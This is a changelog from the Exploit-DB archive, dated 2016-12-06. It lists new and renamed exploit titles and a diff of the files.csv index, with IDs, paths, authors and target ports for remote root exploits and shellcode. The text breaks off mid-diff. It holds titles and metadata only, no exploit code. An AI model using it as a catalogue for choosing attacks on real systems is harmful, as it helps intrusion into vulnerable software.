DB: 2016-12-06

5 new exploits

Foxit Reader 4.1.1 - Stack Overflow (Egghunter Mod)
Foxit Reader 4.1.1 - Stack Overflow (Egghunter)

iSQL 1.0 - Shell Command Injection
iSQL 1.0 - Command Injection
Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection
Microsoft Excel Starter 2010 - XML External Entity Injection
Microsoft Windows Media Center 6.1.7600 - 'ehshell.exe' XML External Entity Injection

Samba 2.2.x - Remote Root Buffer Overflow
Samba 2.2.x - Buffer Overflow
PoPToP PPTP 1.1.4-b3 - Remote Root Exploit
Snort 1.9.1 - 'p7snort191.sh' Remote Root Exploit
PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Root Exploit
PoPToP PPTP 1.1.4-b3 - Remote Command Execution
Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution
PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution

Sendmail 8.12.8 - Prescan() BSD Remote Root Exploit
Sendmail 8.12.8 - Prescan() BSD Remote Command Execution

WsMp3d 0.x - Remote Root Heap Overflow
WsMp3d 0.x - Heap Overflow

Atftpd 0.6 - 'atftpdx.c' Remote Root Exploit
Atftpd 0.6 - 'atftpdx.c' Remote Command Execution

Samba 2.2.8 - (Brute Force Method) Remote Root Exploit
Samba 2.2.8 - (Brute Force Method) Remote Command Execution

WU-FTPD 2.6.2 - Off-by-One Remote Root Exploit
WU-FTPD 2.6.2 - Off-by-One Remote Command Execution

WU-FTPD 2.6.2 - Remote Root Exploit
WU-FTPD 2.6.2 - Remote Command Execution

WU-FTPD 2.6.0 - Remote Root Exploit
WU-FTPD 2.6.0 - Remote Command Execution

LPRng 3.6.22/23/24 - Remote Root Exploit
LPRng 3.6.22/23/24 - Remote Command Execution

LPRng 3.6.24-1 - Remote Root Exploit
LPRng 3.6.24-1 - Remote Command Execution
WU-FTPD 2.6.1 - Remote Root Exploit
SSH (x2) - Remote Root Exploit
WU-FTPD 2.6.1 - Remote Command Execution
SSH (x2) - Remote Command Execution

BSD TelnetD - Remote Root Exploit (1)
BSD TelnetD - Remote Command Execution (1)

Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit
Sendmail with clamav-milter < 0.91.2 - Remote Command Execution

ProFTPd IAC 1.3.x - Remote Root Exploit
ProFTPd IAC 1.3.x - Remote Command Execution

Exim 4.63 - Remote Root Exploit
Exim 4.63 - Remote Command Execution

Splunk - Remote Root Exploit
Splunk - Remote Command Execution

FreeBSD OpenSSH 3.5p1 - Remote Root Exploit
FreeBSD OpenSSH 3.5p1 - Remote Command Execution

HP Data Protector (Linux) - Remote Root Shell
HP Data Protector (Linux) - Remote Command Execution

FreeBSD ftpd and ProFTPd on FreeBSD - Remote Root Exploit
FreeBSD ftpd and ProFTPd on FreeBSD - Remote Command Execution

Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion (Root Remote Code Execution)
Symantec Web Gateway 5.0.2 - Local/Remote File Inclusion (Remote Code Execution)

BSD TelnetD - Remote Root Exploit (2)
BSD TelnetD - Remote Command Execution (2)

Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion (Root Remote Code Execution)
Symantec Web Gateway 5.0.3.18 - Local/Remote File Inclusion (Remote Command Execution)

Sendmail 8.6.9 IDENT - Remote Root Exploit
Sendmail 8.6.9 IDENT - Remote Command Execution

Sitecom MD-25x - Multiple Vulnerabilities / Reverse Root Shell
Sitecom MD-25x - Multiple Vulnerabilities / Reverse Root Exploit

ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM/root SQL Injection
ManageEngine Security Manager Plus 5.5 build 5505 - Remote SYSTEM/Root SQL Injection

H-Sphere Webshell 2.4 - Remote Root Exploit
H-Sphere Webshell 2.4 - Remote Command Execution

MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Root Exploit
MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Command Execution

Ubiquiti AirOS 5.5.2 - Remote Authenticated Root Command Execution
Ubiquiti AirOS 5.5.2 - Authenticated Remote Command Execution

Allied Telesis AT-MCF2000M 3.0.2 - Gaining Root Shell Access
Allied Telesis AT-MCF2000M 3.0.2 - Remote Command Execution

Novell NCP - Unauthenticated Remote Root Exploit
Novell NCP - Unauthenticated Remote Command Execution

Seowonintech Devices - Remote Root Exploit
Seowonintech Devices - Remote Command Execution

ASUS RT-AC66U - acsd Parameter Remote Root Shell
ASUS RT-AC66U - 'acsd' Parameter  Remote Command Execution

ASUS RT-N56U - Remote Root Shell Buffer Overflow (ROP)
ASUS RT-N56U - Remote Buffer Overflow (ROP)

NovaSTOR NovaNET 12.0 - Remote Root Exploit
NovaSTOR NovaNET 12.0 - Remote Command Execution

ALCASAR 2.8 - Remote Root Code Execution
ALCASAR 2.8 - Remote Code Execution

F5 iControl - Remote Root Command Execution (Metasploit)
F5 iControl - Remote Command Execution (Metasploit)

Barracuda Firmware 5.0.0.012 - Authenticated Remote Root Exploit (Metasploit)
Barracuda Firmware 5.0.0.012 - Authenticated Remote Command Execution (Metasploit)

Seagate Central 2014.0410.0026-F - Remote Root Exploit
Seagate Central 2014.0410.0026-F - Remote Command Execution

Proxmox VE 3/4 - Insecure Hostname Checking Remote Root Exploit
Proxmox VE 3/4 - Insecure Hostname Checking Remote Command Execution

Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit)
Barracuda Web App Firewall 8.0.1.007/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit)
Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Root Exploit (Metasploit) (3)
Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Root Exploit (Metasploit)
Barracuda Web App Firewall 8.0.1.008/Load Balancer 5.4.0.004 - Authenticated Remote Command Execution (Metasploit) (3)
Barracuda Web Application Firewall 8.0.1.008 - Authenticated Remote Command Execution (Metasploit)
BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Code Execution
Alcatel Lucent Omnivista 8770 - Remote Code Execution

Windows x86 - Password Protected TCP Bind Shell (637 bytes)
Windows x86 - Password Protected TCP Bind Shellcode (637 bytes)

Windows x86 - URLDownloadToFileA() + SetFileAttributesA() + WinExec() + ExitProcess() Shellcode (394 bytes)
Windows x86 - URLDownloadToFileA() / SetFileAttributesA() / WinExec() / ExitProcess() Shellcode (394 bytes)

Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon Shellcode (83_ 148_ 177 bytes)
Linux/x86-64 - Syscall Persistent Bind Shell / Multi-terminal / Password / Daemon Shellcode (83_ 148_ 177 bytes)

Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal Shellcode (84_ 122_ 172 bytes)
Linux/x86-64 - Subtle Probing Reverse Shell / Timer_ Burst / Password / Multi-Terminal Shellcode (84_ 122_ 172 bytes)
Linux/x86 - NetCat Bind Shell with Port (44 / 52 bytes)
Linux/x86 - zsh TCP Bind Shell Port 9090 (96 bytes)
Linux/x86 - NetCat Bind Shellcode with Port (44 / 52 bytes)
Linux/x86 - zsh TCP Port 9090 Bind Shellcode (96 bytes)

Astium VoIP PBX 2.1 build 25399 - Multiple Vulnerabilities/Remote Root Exploit
Astium VoIP PBX 2.1 build 25399 - Multiple Vulnerabilities/Remote Command Execution

SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Root/SYSTEM Exploit
SonicWALL GMS/VIEWPOINT 6.x Analyzer 7.x - Remote Command Execution

D-Link DSR Router Series - Remote Root Shell
D-Link DSR Router Series - Remote Command Execution

Alacate-Lucent OmniVista 4760 - Multiple Cross-Site Scripting Vulnerabilities
Alcatel Lucent Omnivista 4760 - Multiple Cross-Site Scripting Vulnerabilities

ALCASAR 2.8.1 - Remote Root Code Execution
ALCASAR 2.8.1 - Remote Code Execution

SevOne NMS 5.3.6.0 - Remote Root Exploit
SevOne NMS 5.3.6.0 - Remote Command Execution

Iris ID IrisAccess ICU 7000-2 - Remote Root Command Execution
Iris ID IrisAccess ICU 7000-2 - Remote Command Execution

NUUO NVRmini 2 3.0.8 - Remote Root Exploit
NUUO NVRmini 2 3.0.8 - Remote Code Execution

EyeLock nano NXT 3.5 - Remote Root Exploit
EyeLock nano NXT 3.5 - Remote Code Execution

InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Root Command Execution
InfraPower PPS-02-S Q213V1 - Unauthenticated Remote Command Execution

files.csv

@@ -6563,7 +6563,7 @@ id,file,description,date,author,platform,type,port
 15539,platforms/windows/local/15539.pl,"Realtek Audio Control Panel 1.0.1.65 - Exploit",2010-11-14,BraniX,windows,local,0
 15540,platforms/windows/local/15540.pl,"Realtek Audio Microphone Calibration 1.1.1.6 - Exploit",2010-11-14,BraniX,windows,local,0
 15541,platforms/windows/local/15541.pl,"Realtek HD Audio Control Panel 2.1.3.2 - Exploit",2010-11-14,BraniX,windows,local,0
-15542,platforms/windows/local/15542.py,"Foxit Reader 4.1.1 - Stack Overflow (Egghunter Mod)",2010-11-15,dookie,windows,local,0
+15542,platforms/windows/local/15542.py,"Foxit Reader 4.1.1 - Stack Overflow (Egghunter)",2010-11-15,dookie,windows,local,0
 15566,platforms/windows/local/15566.rb,"DIZzy 1.12 - Local Stack Overflow",2010-11-18,g30rg3_x,windows,local,0
 15569,platforms/windows/local/15569.rb,"MP3-Nator - Buffer Overflow (SEH DEP Bypass)",2010-11-18,"Muhamad Fadzil Ramli",windows,local,0
 15575,platforms/windows/local/15575.py,"MiniShare 1.5.5 - 'users.txt' Buffer Overflow (Egghunter)",2010-11-19,0v3r,windows,local,0
@@ -8550,7 +8550,7 @@ id,file,description,date,author,platform,type,port
 39908,platforms/windows/local/39908.txt,"Matrix42 Remote Control Host 3.20.0031 - Unquoted Path Privilege Escalation",2016-06-10,"Roland C. Redl",windows,local,0
 39916,platforms/windows/local/39916.txt,"Riot Games League of Legends - Insecure File Permissions Privilege Escalation",2016-06-10,"Cyril Vallicari",windows,local,0
 39933,platforms/windows/local/39933.py,"Easy RM to MP3 Converter 2.7.3.700 - '.m3u' Exploit (Universal ASLR + DEP Bypass)",2016-06-13,"Fitzl Csaba",windows,local,0
-39938,platforms/linux/local/39938.rb,"iSQL 1.0 - Shell Command Injection",2016-06-13,HaHwul,linux,local,0
+39938,platforms/linux/local/39938.rb,"iSQL 1.0 - Command Injection",2016-06-13,HaHwul,linux,local,0
 39954,platforms/windows/local/39954.txt,"AdobeUpdateService 3.6.0.248 - Unquoted Service Path Privilege Escalation",2016-06-15,"Cyril Vallicari",windows,local,0
 40054,platforms/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,linux,local,0
 39980,platforms/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - SEH Based Stack Overflow (Metasploit)",2016-06-20,s0nk3y,windows,local,0
@@ -8670,29 +8670,32 @@ id,file,description,date,author,platform,type,port
 40839,platforms/linux/local/40839.c,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' PTRACE_POKEDATA Race Condition Privilege Escalation (/etc/passwd)",2016-11-28,FireFart,linux,local,0
 40847,platforms/linux/local/40847.cpp,"Linux Kernel 2.6.22 < 3.9 - 'Dirty COW' /proc/self/mem Race Condition Privilege Escalation (/etc/passwd)",2016-11-27,"Gabriele Bonacini",linux,local,0
 40848,platforms/windows/local/40848.java,"WinPower 4.9.0.4 - Privilege Escalation",2016-11-29,"Kacper Szurek",windows,local,0
+40859,platforms/windows/local/40859.txt,"Microsoft Authorization Manager 6.1.7601 - 'azman' XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0
+40860,platforms/windows/local/40860.txt,"Microsoft Excel Starter 2010 - XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0
+40861,platforms/windows/local/40861.txt,"Microsoft Windows Media Center 6.1.7600 - 'ehshell.exe' XML External Entity Injection",2016-12-04,hyp3rlinx,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
-7,platforms/linux/remote/7.pl,"Samba 2.2.x - Remote Root Buffer Overflow",2003-04-07,"H D Moore",linux,remote,139
+7,platforms/linux/remote/7.pl,"Samba 2.2.x - Buffer Overflow",2003-04-07,"H D Moore",linux,remote,139
 8,platforms/linux/remote/8.c,"SETI@home Clients - Buffer Overflow",2003-04-08,zillion,linux,remote,0
 10,platforms/linux/remote/10.c,"Samba 2.2.8 - Remote Root Exploit",2003-04-10,eSDee,linux,remote,139
-16,platforms/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Root Exploit",2003-04-18,einstein,linux,remote,1723
+16,platforms/linux/remote/16.c,"PoPToP PPTP 1.1.4-b3 - Remote Command Execution",2003-04-18,einstein,linux,remote,1723
-18,platforms/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Root Exploit",2003-04-23,truff,linux,remote,0
+18,platforms/linux/remote/18.sh,"Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution",2003-04-23,truff,linux,remote,0
-19,platforms/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Root Exploit",2003-04-25,blightninjas,linux,remote,1723
+19,platforms/linux/remote/19.c,"PoPToP PPTP 1.1.4-b3 - 'poptop-sane.c' Remote Command Execution",2003-04-25,blightninjas,linux,remote,1723
 20,platforms/windows/remote/20.txt,"Microsoft Windows - SMB Authentication Remote Exploit",2003-04-25,"Haamed Gheibi",windows,remote,139
 23,platforms/windows/remote/23.c,"RealServer < 8.0.2 (Windows Platforms) - Remote Exploit",2003-04-30,"Johnny Cyberpunk",windows,remote,554
-24,platforms/linux/remote/24.c,"Sendmail 8.12.8 - Prescan() BSD Remote Root Exploit",2003-04-30,bysin,linux,remote,25
+24,platforms/linux/remote/24.c,"Sendmail 8.12.8 - Prescan() BSD Remote Command Execution",2003-04-30,bysin,linux,remote,25
 25,platforms/linux/remote/25.c,"OpenSSH/PAM 3.6.1p1 - Remote Users Discovery Tool",2003-04-30,"Maurizio Agazzini",linux,remote,0
 26,platforms/linux/remote/26.sh,"OpenSSH/PAM 3.6.1p1 - 'gossh.sh' Remote Users Ident",2003-05-02,"Nicolas Couture",linux,remote,0
 27,platforms/linux/remote/27.pl,"CommuniGate Pro Webmail 4.0.6 - Session Hijacking Exploit",2003-05-05,"Yaroslav Polyakov",linux,remote,80
 28,platforms/windows/remote/28.c,"Kerio Personal Firewall 2.1.4 - Remote Code Execution",2003-05-08,Burebista,windows,remote,0
 30,platforms/windows/remote/30.pl,"Snitz Forums 3.3.03 - Remote Command Execution",2003-05-12,anonymous,windows,remote,0
-33,platforms/linux/remote/33.c,"WsMp3d 0.x - Remote Root Heap Overflow",2003-05-22,Xpl017Elz,linux,remote,8000
+33,platforms/linux/remote/33.c,"WsMp3d 0.x - Heap Overflow",2003-05-22,Xpl017Elz,linux,remote,8000
 34,platforms/linux/remote/34.pl,"Webfroot Shoutbox < 2.32 - (Apache) Remote Exploit",2003-05-29,anonymous,linux,remote,80
 36,platforms/windows/remote/36.c,"Microsoft Windows - WebDAV Remote Root Exploit (2)",2003-06-01,alumni,windows,remote,80
 37,platforms/windows/remote/37.pl,"Microsoft Internet Explorer - Object Tag Exploit (MS03-020)",2003-06-07,alumni,windows,remote,0
 38,platforms/linux/remote/38.pl,"Apache 2.0.45 - APR Remote Exploit",2003-06-08,"Matthew Murphy",linux,remote,80
-39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Root Exploit",2003-06-10,gunzip,linux,remote,69
+39,platforms/linux/remote/39.c,"Atftpd 0.6 - 'atftpdx.c' Remote Command Execution",2003-06-10,gunzip,linux,remote,69
 41,platforms/linux/remote/41.pl,"mnoGoSearch 3.1.20 - Remote Command Execution",2003-06-10,pokleyzz,linux,remote,80
 42,platforms/windows/remote/42.c,"Winmail Mail Server 2.3 - Remote Format String",2003-06-11,ThreaT,windows,remote,25
 43,platforms/linux/remote/43.pl,"ProFTPd 1.2.9RC1 - 'mod_sql' SQL Injection",2003-06-19,Spaine,linux,remote,21
@@ -8703,7 +8706,7 @@ id,file,description,date,author,platform,type,port
 50,platforms/windows/remote/50.pl,"ColdFusion MX - Remote Development Service Exploit",2003-07-07,"angry packet",windows,remote,80
 51,platforms/windows/remote/51.c,"Microsoft IIS 5.0 - WebDAV Remote Root Exploit (3) (xwdav)",2003-07-08,Schizoprenic,windows,remote,80
 54,platforms/windows/remote/54.c,"LeapWare LeapFTP 2.7.x - Remote Buffer Overflow",2003-07-12,drG4njubas,windows,remote,21
-55,platforms/linux/remote/55.c,"Samba 2.2.8 - (Brute Force Method) Remote Root Exploit",2003-07-13,Schizoprenic,linux,remote,139
+55,platforms/linux/remote/55.c,"Samba 2.2.8 - (Brute Force Method) Remote Command Execution",2003-07-13,Schizoprenic,linux,remote,139
 56,platforms/windows/remote/56.c,"Microsoft Windows Media Services - 'nsiislog.dll' Remote Exploit",2003-07-14,anonymous,windows,remote,80
 57,platforms/solaris/remote/57.txt,"Solaris 2.6/7/8 - (TTYPROMPT in.telnet) Remote Authentication Bypass",2002-11-02,"Jonathan S.",solaris,remote,0
 58,platforms/linux/remote/58.c,"Citadel/UX BBS 6.07 - Remote Exploit",2003-07-17,"Carl Livitt",linux,remote,504
@@ -8713,10 +8716,10 @@ id,file,description,date,author,platform,type,port
 67,platforms/multiple/remote/67.c,"Apache 1.3.x mod_mylo - Remote Code Execution",2003-07-28,"Carl Livitt",multiple,remote,80
 69,platforms/windows/remote/69.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (1)",2003-07-29,pHrail,windows,remote,135
 70,platforms/windows/remote/70.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (2)",2003-07-30,anonymous,windows,remote,135
-74,platforms/linux/remote/74.c,"WU-FTPD 2.6.2 - Off-by-One Remote Root Exploit",2003-08-03,Xpl017Elz,linux,remote,21
+74,platforms/linux/remote/74.c,"WU-FTPD 2.6.2 - Off-by-One Remote Command Execution",2003-08-03,Xpl017Elz,linux,remote,21
 76,platforms/windows/remote/76.c,"Microsoft Windows - 'RPC DCOM' Remote Exploit (Universal)",2003-08-07,oc192,windows,remote,135
 77,platforms/hardware/remote/77.c,"Cisco IOS 12.x/11.x - HTTP Remote Integer Overflow",2003-08-10,FX,hardware,remote,80
-78,platforms/linux/remote/78.c,"WU-FTPD 2.6.2 - Remote Root Exploit",2003-08-11,Xpl017Elz,linux,remote,21
+78,platforms/linux/remote/78.c,"WU-FTPD 2.6.2 - Remote Command Execution",2003-08-11,Xpl017Elz,linux,remote,21
 80,platforms/windows/remote/80.c,"Oracle XDB FTP Service - UNLOCK Buffer Overflow",2003-08-13,"David Litchfield",windows,remote,2100
 81,platforms/windows/remote/81.c,"Microsoft Windows 2000 - RSVP Server Authority Hijacking (PoC)",2003-08-15,"ste jones",windows,remote,0
 83,platforms/windows/remote/83.html,"Microsoft Internet Explorer - Object Data Remote Exploit (MS03-032)",2003-08-21,malware,windows,remote,0
@@ -8778,17 +8781,17 @@ id,file,description,date,author,platform,type,port
 190,platforms/windows/remote/190.c,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (9)",2000-11-18,Optyx,windows,remote,80
 191,platforms/windows/remote/191.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (7)",2000-11-18,steeLe,windows,remote,80
 192,platforms/windows/remote/192.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (8)",2000-11-18,"Roelof Temmingh",windows,remote,80
-201,platforms/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Root Exploit",2000-11-21,venglin,multiple,remote,21
+201,platforms/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Command Execution",2000-11-21,venglin,multiple,remote,21
 204,platforms/linux/remote/204.c,"BFTPd - vsprintf() Format Strings Exploit",2000-11-29,DiGiT,linux,remote,21
 208,platforms/linux/remote/208.c,"INND/NNRP < 1.6.x - Remote Root Overflow",2000-11-30,"Babcia Padlina",linux,remote,119
 211,platforms/cgi/remote/211.c,"PHF (Linux/x86) - Buffer Overflow",2000-12-01,proton,cgi,remote,0
 213,platforms/solaris/remote/213.c,"Solaris sadmind - Remote Buffer Overflow",2000-12-01,Optyx,solaris,remote,111
 220,platforms/linux/remote/220.c,"PHP 3.0.16/4.0.2 - Remote Format Overflow",2000-12-06,Gneisenau,linux,remote,80
 225,platforms/linux/remote/225.c,"BFTPd 1.0.12 - Remote Exploit",2000-12-11,korty,linux,remote,21
-226,platforms/linux/remote/226.c,"LPRng 3.6.22/23/24 - Remote Root Exploit",2000-12-11,sk8,linux,remote,515
+226,platforms/linux/remote/226.c,"LPRng 3.6.22/23/24 - Remote Command Execution",2000-12-11,sk8,linux,remote,515
 227,platforms/linux/remote/227.c,"LPRng (RedHat 7.0) - lpd Remote Root Format String",2000-12-11,DiGiT,linux,remote,515
 228,platforms/bsd/remote/228.c,"Oops! 1.4.6 - (one russi4n proxy-server) Heap Buffer Overflow",2000-12-15,diman,bsd,remote,3128
-230,platforms/linux/remote/230.c,"LPRng 3.6.24-1 - Remote Root Exploit",2000-12-15,VeNoMouS,linux,remote,515
+230,platforms/linux/remote/230.c,"LPRng 3.6.24-1 - Remote Command Execution",2000-12-15,VeNoMouS,linux,remote,515
 232,platforms/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 - Blocked Port Bypass Exploit",2000-12-19,Unknown,windows,remote,0
 234,platforms/bsd/remote/234.c,"OpenBSD ftpd 2.6 / 2.7 - Remote Exploit",2000-12-20,Scrippie,bsd,remote,21
 237,platforms/linux/remote/237.c,"Linux Kernel 2.2 - TCP/IP Weakness Spoof IP Exploit",2001-01-02,Stealth,linux,remote,513
@@ -8825,8 +8828,8 @@ id,file,description,date,author,platform,type,port
 340,platforms/linux/remote/340.c,"Linux imapd - Remote Overflow File Retrieve Exploit",1997-06-24,p1,linux,remote,143
 346,platforms/linux/remote/346.c,"Solaris /bin/login (SPARC/x86) - Remote Root Exploit",2001-12-20,Teso,linux,remote,23
 347,platforms/linux/remote/347.c,"Squid 2.4.1 - Remote Buffer Overflow",2002-05-14,Teso,linux,remote,0
-348,platforms/linux/remote/348.c,"WU-FTPD 2.6.1 - Remote Root Exploit",2002-05-14,Teso,linux,remote,21
+348,platforms/linux/remote/348.c,"WU-FTPD 2.6.1 - Remote Command Execution",2002-05-14,Teso,linux,remote,21
-349,platforms/multiple/remote/349.txt,"SSH (x2) - Remote Root Exploit",2002-05-01,Teso,multiple,remote,22
+349,platforms/multiple/remote/349.txt,"SSH (x2) - Remote Command Execution",2002-05-01,Teso,multiple,remote,22
 359,platforms/linux/remote/359.c,"Drcat 0.5.0-beta - (drcatd) Remote Root Exploit",2004-07-22,Taif,linux,remote,3535
 361,platforms/windows/remote/361.txt,"Flash FTP Server - Directory Traversal",2004-07-22,CoolICE,windows,remote,0
 364,platforms/linux/remote/364.pl,"Samba 3.0.4 SWAT - Authorisation Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901
@@ -8849,7 +8852,7 @@ id,file,description,date,author,platform,type,port
 404,platforms/linux/remote/404.pl,"PlaySMS 0.7 - SQL Injection",2004-08-19,"Noam Rathaus",linux,remote,0
 405,platforms/linux/remote/405.c,"XV 3.x - BMP Parsing Local Buffer Overflow",2004-08-20,infamous41md,linux,remote,0
 408,platforms/linux/remote/408.c,"Qt - '.bmp' Parsing Bug Heap Overflow",2004-08-21,infamous41md,linux,remote,0
-409,platforms/bsd/remote/409.c,"BSD TelnetD - Remote Root Exploit (1)",2001-06-09,Teso,bsd,remote,23
+409,platforms/bsd/remote/409.c,"BSD TelnetD - Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23
 413,platforms/linux/remote/413.c,"MusicDaemon 0.0.3 - Remote Denial of Service / /etc/shadow Stealer (2)",2004-08-24,Tal0n,linux,remote,0
 416,platforms/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection",2004-08-25,"Serkan Akpolat",linux,remote,0
 418,platforms/windows/remote/418.c,"Winamp 5.04 - Skin File (.wsz) Remote Code Execution",2004-08-25,"Petrol Designs",windows,remote,0
@@ -9520,7 +9523,7 @@ id,file,description,date,author,platform,type,port
 4747,platforms/windows/remote/4747.vbs,"RaidenHTTPD 2.0.19 - (ulang) Remote Command Execution",2007-12-18,rgod,windows,remote,0
 4754,platforms/windows/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - logurl() Remote Buffer Overflow (Perl)",2007-12-18,"Marcin Kozlowski",windows,remote,3128
 4760,platforms/windows/remote/4760.txt,"Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue Exploit (MS07-065)",2007-12-21,"Andres Tarasco",windows,remote,0
-4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Root Exploit",2007-12-21,eliteboy,multiple,remote,25
+4761,platforms/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Command Execution",2007-12-21,eliteboy,multiple,remote,25
 4784,platforms/windows/remote/4784.pl,"BadBlue 2.72 - PassThru Remote Buffer Overflow",2007-12-24,"Jacopo Cervini",windows,remote,80
 4797,platforms/hardware/remote/4797.pl,"March Networks DVR 3204 - Logfile Information Disclosure",2007-12-27,"Alex Hernandez",hardware,remote,0
 4806,platforms/windows/remote/4806.html,"Persits Software XUpload Control - AddFolder() Buffer Overflow",2007-12-28,Elazar,windows,remote,0
@@ -10315,7 +10318,7 @@ id,file,description,date,author,platform,type,port
 15437,platforms/windows/remote/15437.txt,"Quick Tftp Server Pro 2.1 - Directory Traversal",2010-11-05,"Yakir Wizman",windows,remote,0
 15438,platforms/windows/remote/15438.txt,"AT-TFTP Server 1.8 - Directory Traversal",2010-11-06,"Yakir Wizman",windows,remote,0
 15445,platforms/windows/remote/15445.txt,"Femitter FTP Server 1.04 - Directory Traversal",2010-11-06,chr1x,windows,remote,0
-15449,platforms/linux/remote/15449.pl,"ProFTPd IAC 1.3.x - Remote Root Exploit",2010-11-07,kingcope,linux,remote,0
+15449,platforms/linux/remote/15449.pl,"ProFTPd IAC 1.3.x - Remote Command Execution",2010-11-07,kingcope,linux,remote,0
 15450,platforms/windows/remote/15450.txt,"filecopa ftp server 6.01 - Directory Traversal",2010-11-07,"Pawel Wylecial",windows,remote,21
 15505,platforms/hardware/remote/15505.txt,"Camtron CMNC-200 IP Camera - Directory Traversal",2010-11-13,"Trustwave's SpiderLabs",hardware,remote,0
 15548,platforms/android/remote/15548.html,"Android 2.0/2.1 - Use-After-Free Remote Code Execution on Webkit",2010-11-15,"Itzhak Avraham",android,remote,0
@@ -10330,7 +10333,7 @@ id,file,description,date,author,platform,type,port
 15689,platforms/windows/remote/15689.py,"Freefloat FTP Server - Buffer Overflow",2010-12-05,0v3r,windows,remote,0
 15717,platforms/multiple/remote/15717.txt,"VMware Tools - Update OS Command Injection",2010-12-09,"Nahuel Grisolia",multiple,remote,0
 15723,platforms/freebsd/remote/15723.c,"FreeBSD Litespeed Web Server 4.0.17 with PHP - Remote Exploit",2010-12-10,kingcope,freebsd,remote,0
-15725,platforms/linux/remote/15725.pl,"Exim 4.63 - Remote Root Exploit",2010-12-11,kingcope,linux,remote,0
+15725,platforms/linux/remote/15725.pl,"Exim 4.63 - Remote Command Execution",2010-12-11,kingcope,linux,remote,0
 15733,platforms/windows/remote/15733.html,"Crystal Reports Viewer 12.0.0.549 - 'PrintControl.dll' ActiveX Exploit",2010-12-14,Dr_IDE,windows,remote,0
 15746,platforms/windows/remote/15746.rb,"Microsoft Internet Explorer 8 - CSS Parser Exploit",2010-12-15,"Nephi Johnson",windows,remote,0
 15802,platforms/windows/remote/15802.txt,"ecava IntegraXor 3.6.4000.0 - Directory Traversal",2010-12-21,"Luigi Auriemma",windows,remote,0
@@ -10344,7 +10347,7 @@ id,file,description,date,author,platform,type,port
 15868,platforms/windows/remote/15868.pl,"QuickPHP Web Server Arbitrary - 'src .php' File Download",2010-12-30,"Yakir Wizman",windows,remote,0
 15869,platforms/windows/remote/15869.txt,"CA ARCserve D2D r15 - Web Service Servlet Code Execution",2010-12-30,rgod,windows,remote,0
 15885,platforms/windows/remote/15885.html,"HP Photo Creative 2.x audio.Record.1 - ActiveX Control Remote Stack Based Buffer Overflow",2011-01-01,rgod,windows,remote,0
-18245,platforms/multiple/remote/18245.py,"Splunk - Remote Root Exploit",2011-12-15,"Gary O'Leary-Steele",multiple,remote,0
+18245,platforms/multiple/remote/18245.py,"Splunk - Remote Command Execution",2011-12-15,"Gary O'Leary-Steele",multiple,remote,0
 15991,platforms/windows/remote/15991.html,"Real Networks RealPlayer SP - 'RecordClip' Method Remote Code Execution",2011-01-14,"Sean de Regge",windows,remote,0
 15957,platforms/windows/remote/15957.py,"KingView 6.5.3 - SCADA HMI Heap Overflow (PoC)",2011-01-09,"Dillon Beresford",windows,remote,0
 15937,platforms/multiple/remote/15937.pl,"NetSupport Manager Agent - Remote Buffer Overflow (1)",2011-01-08,ikki,multiple,remote,0
@@ -11004,7 +11007,7 @@ id,file,description,date,author,platform,type,port
 17450,platforms/windows/remote/17450.rb,"Siemens FactoryLink 8 - CSService Logging Path Parameter Buffer Overflow (Metasploit)",2011-06-25,Metasploit,windows,remote,0
